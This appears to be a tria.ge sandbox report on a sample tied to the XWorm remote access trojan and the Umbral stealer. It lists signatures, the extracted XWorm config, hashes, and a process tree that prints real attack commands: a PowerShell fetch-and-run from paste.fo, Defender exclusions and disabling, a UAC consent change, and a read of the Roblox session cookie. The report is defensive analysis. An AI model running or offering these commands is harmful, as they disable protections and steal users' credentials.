Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    299s
  • max time network
    300s
  • platform
    windows11-21h2_x64
  • resource
    win11-20241007-en
  • resource tags

    arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    04/01/2025, 18:13

General

  • Target

    New Text Document.txt

  • Size

    48B

  • MD5

    534f5be9d239737fc0f7988c0d8f55ab

  • SHA1

    7bd8add72810ae2c725bcbd4f001ee37e1aef16e

  • SHA256

    bd9337e4327ce6c4b8cf3c2de54bc60605f93d59a87e4e6f1b9d90a4d73ec3bf

  • SHA512

    e6447c19a57b17c252f9569c22b737ae9ca2afb7ef307bf3d7513af96c4b95e1f66280277ad22c9e8cff0db99f6aea02c12965a04568766d2c2e2101e6f2f93b

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

AEfEUs08j7ZtP2B5

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

  • pastebin_url

    https://pastebin.com/raw/pv132qGS

aes.plain

Signatures

  • Detect Umbral payload 2 IoCs
  • Detect Xworm Payload 2 IoCs
  • UAC bypass 3 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Umbral family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 5 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 38 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\New Text Document.txt"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:3520
    • C:\Windows\system32\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\New Text Document.txt
      2⤵
        PID:1320
    • C:\Windows\system32\BackgroundTransferHost.exe
      "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
      1⤵
      • Modifies registry class
      PID:1832
    • C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:660
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell "irm paste.fo/raw/7085afc2db6e | iex"
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2212
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath $Env:ProgramData, $Env:Temp, $Env:HomeDrive; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 0 -Type DWord
          3⤵
          • UAC bypass
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3220
        • C:\ProgramData\SVrB5SO0.exe
          "C:\ProgramData\SVrB5SO0.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:4728
          • C:\Users\Admin\AppData\Local\Temp\svhost.exe
            "C:\Users\Admin\AppData\Local\Temp\svhost.exe"
            4⤵
            • Drops file in Drivers directory
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4180
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svhost.exe'
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4800
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1400
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3904
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              5⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4776
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" os get Caption
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1000
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" computersystem get totalphysicalmemory
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4116
            • C:\Windows\System32\Wbem\wmic.exe
              "wmic.exe" csproduct get uuid
              5⤵
                PID:3784
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                PID:4572
              • C:\Windows\System32\Wbem\wmic.exe
                "wmic" path win32_VideoController get name
                5⤵
                • Detects videocard installed
                PID:3136
            • C:\Users\Admin\AppData\Local\Temp\svchost.exe
              "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
              4⤵
              • Drops startup file
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4620
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\svchost.exe'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3208
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4276
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4692
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost'
                5⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1460
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        1⤵
          PID:3584

        Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\ProgramData\SVrB5SO0.exe

          Filesize

          122KB

          MD5

          23c81c7ea6b302b5171d035742228599

          SHA1

          83f6712a0f42802d39356edabf6b74f37e049edd

          SHA256

          797ec2edd1d1a40a58004e5cda724f010310cdb388c368cb19ebc2aef0505a51

          SHA512

          931a6d93ce3422479479f5cdd073781cfd5d35e0244996242138f2dc2ffec953a43922d4fa14b16dab661dfe58a0331e7d1b208f04a39f03d0ad2ab7bb1fb962

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          2KB

          MD5

          88dc70c361a22feac57b031dd9c1f02f

          SHA1

          a9b4732260c2a323750022a73480f229ce25d46d

          SHA256

          43244c0820ec5074e654ecd149fa744f51b2c1522e90285567713dae64b62f59

          SHA512

          19c0532741ebc9751390e6c5ca593a81493652f25c74c8cab29a8b5b1f1efef8d511254a04f50b0c4a20724bae10d96d52af7a76b0c85ddc5f020d4cac41100c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          de1cbc191bee1d162d00561785ff3e3f

          SHA1

          e65c6208aaeb730c3242fec9afbfe797fb464f66

          SHA256

          7eda0e7287adda6d5511bb314988c270a1ec05a6bd7fcbfab698ed7b4b195434

          SHA512

          af507d8a805f43842e87414b43c1a0f8973f3d663d2efeb0556b9d212741d159e2f0d0e0528588d9dba1278cca1efd37ab4d28c118c4424345191d0b016d2013

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          63e54ca6551a4a091cca75d55e9122b2

          SHA1

          7afd34b6d2008fec2a36d984d535aea7406a66ce

          SHA256

          e263f5f17c235debb019644319a773d5feabd2f80fdb3d7783762ba572fe875b

          SHA512

          22e332795de470945a1864cfe32e90cd993554cf139467610abdb20b1608c2a7e0177f001b2b6f0032daa780980207943b6e1e4f0960e0576a1aea76fd1dd13e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          de89a1120b8481c3c1b76f2add8f73f1

          SHA1

          8436ce4747b20112c880b6aa5defc64e1c17bbe5

          SHA256

          b217a895d769427909ac8a7f38b0992083760e1811b1eaf14082cf59cad50e8e

          SHA512

          958f8d1bcf3a585c66123df4a3e9c976d5f90e23e457f33c342ebd4f929aae961a5baef0a19583ebb827707bb6d678a5e66a6637d8c263fb1c9dcf444ae2e2c7

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          21017c68eaf9461301de459f4f07e888

          SHA1

          41ff30fc8446508d4c3407c79e798cf6eaa5bb73

          SHA256

          03b321e48ff3328d9c230308914961fe110c4c7bc96c0a85a296745437bcb888

          SHA512

          956990c11c6c1baa3665ef7ef23ef6073e0a7fcff77a93b5e605a83ff1e60b916d80d45dafb06977aed90868a273569a865cf2c623e295b5157bfff0fb2be35d

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          301355fffac842f25ed3d189d6c193b8

          SHA1

          01b9b89277345425c74b8c0213c53132bcd55373

          SHA256

          d0856ea99d7069a23c3efaf5f476dc747aa95ade755589d4930baece4eed255f

          SHA512

          40e5a6772802cd85560146b2de62bb624da9a4eb6b4b0319a0fcda01c0707faf93958ed56350107840a85b8dcacf49bc35779d6baaaa1064b61d08d1e8eababf

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          df808b11175970c23f00e611a7b6d2cc

          SHA1

          0243f099e483fcafb6838c0055982e65634b6db6

          SHA256

          2d5eec6aeee0c568d08cc1777a67b529dce3133efc761ef4b4643d4b2003d43d

          SHA512

          c7c4e39be7cb6bfda48055cd2b0b05a6b6a71131a124730f62928600a5870303e06e3db54634c45f86310413126d2524f51002d5f36f7012e41b641992b5ac89

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          144f438b0fd835b607788b78c91deedf

          SHA1

          f65a34e8feb1485662c2fba5755877fcbb1b7993

          SHA256

          40d50ef3ef0c466dd4a1fa2f0e64620bac538721b4779c31753aa44368db2ad1

          SHA512

          93bec1d243b234395582f9b11dea41812daa61d13f0d5ebe973266df2757a0ac2f8f9ccff0aa14775da2d50262d14c0292da1a42a4c9886e5932d3ba33b3902c

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          f70b37ca592bbc43f4264f53ab4cbfdc

          SHA1

          b2ca4feeaa2fe02a146216e21cd4b057c3a16c06

          SHA256

          e72516ce98729a87d654c54b2b0985e9938521f0073c1584becfcc5293f50783

          SHA512

          96b171e2679a95d83b231151872cbc0362355c16a2badef95b9dc76697bf972395b1c31d1ac7c3d6926126db805db56000dce3bb900706f40ee0a98f7cb79d8e

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          944B

          MD5

          1a9fa92a4f2e2ec9e244d43a6a4f8fb9

          SHA1

          9910190edfaccece1dfcc1d92e357772f5dae8f7

          SHA256

          0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

          SHA512

          5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          948B

          MD5

          45741c307af2576c6437c5fdb24ef9ce

          SHA1

          a6ba7a7705db14ac29a18a98dd7deb4cc759c3bf

          SHA256

          7887859f7179e194ff9b78f8d8fa3830790110a01597f21ff48c84cd935e49d2

          SHA512

          39fdc5931563cbf826e8b643b5f0dcdf45bb6f95a8eeb460499257ca41b3dbee4c692eaacc3fd33bddf4b6ff0c828981ed7e9cd080007bbb9f0b28e7d0d66941

        • C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\c897f032-8c00-4884-b539-5f4c84b2c2ad.down_data

          Filesize

          555KB

          MD5

          5683c0028832cae4ef93ca39c8ac5029

          SHA1

          248755e4e1db552e0b6f8651b04ca6d1b31a86fb

          SHA256

          855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e

          SHA512

          aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ltrjuwsq.j1y.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Local\Temp\svchost.exe

          Filesize

          39KB

          MD5

          f705f2da1824f04ae5a190b8259c3971

          SHA1

          7e8f02accd7205e564696e791c4dbef66f2b3bd5

          SHA256

          06daf892bd82e2da28a493b7c9dff9b4d822e1d0ba55671772cd032885d6fb4f

          SHA512

          530d56a52067f26d9d50d8edefb68caa65b6be9c58692fc14c417fee7799e3f1ed1ba57b2159be91965034f733a5de7af5042b2297d6f02a6ad282b5b4aa0d56

        • C:\Users\Admin\AppData\Local\Temp\svhost.exe

          Filesize

          231KB

          MD5

          0c01352317f572daab13794a8dc3e3a5

          SHA1

          309b2c1c1d7ea267e4fec39b67f26450d72b30d5

          SHA256

          6c85ac3b26d88512a75af25509b4c5f0a1e345e9c03b3a38884382a70a4748bd

          SHA512

          7ccb1b18ce0090a83938cb84f98104714bb9866ab82df04ffc5a682f3bb7ad76cdf59c0b95cc2a725f58af4358c0f25537087e937296f45f54214d31aa4726ad

        • memory/2212-15-0x0000015E44550000-0x0000015E44712000-memory.dmp

          Filesize

          1.8MB

        • memory/2212-11-0x0000015E43F30000-0x0000015E43F52000-memory.dmp

          Filesize

          136KB

        • memory/4180-89-0x000001D26CA90000-0x000001D26CAAE000-memory.dmp

          Filesize

          120KB

        • memory/4180-88-0x000001D26D530000-0x000001D26D5A6000-memory.dmp

          Filesize

          472KB

        • memory/4180-124-0x000001D26CA60000-0x000001D26CA6A000-memory.dmp

          Filesize

          40KB

        • memory/4180-125-0x000001D26CAB0000-0x000001D26CAC2000-memory.dmp

          Filesize

          72KB

        • memory/4180-87-0x000001D26D440000-0x000001D26D490000-memory.dmp

          Filesize

          320KB

        • memory/4180-62-0x000001D26AC40000-0x000001D26AC80000-memory.dmp

          Filesize

          256KB

        • memory/4620-63-0x00000000009D0000-0x00000000009E0000-memory.dmp

          Filesize

          64KB

        • memory/4728-39-0x0000000000A00000-0x0000000000A24000-memory.dmp

          Filesize

          144KB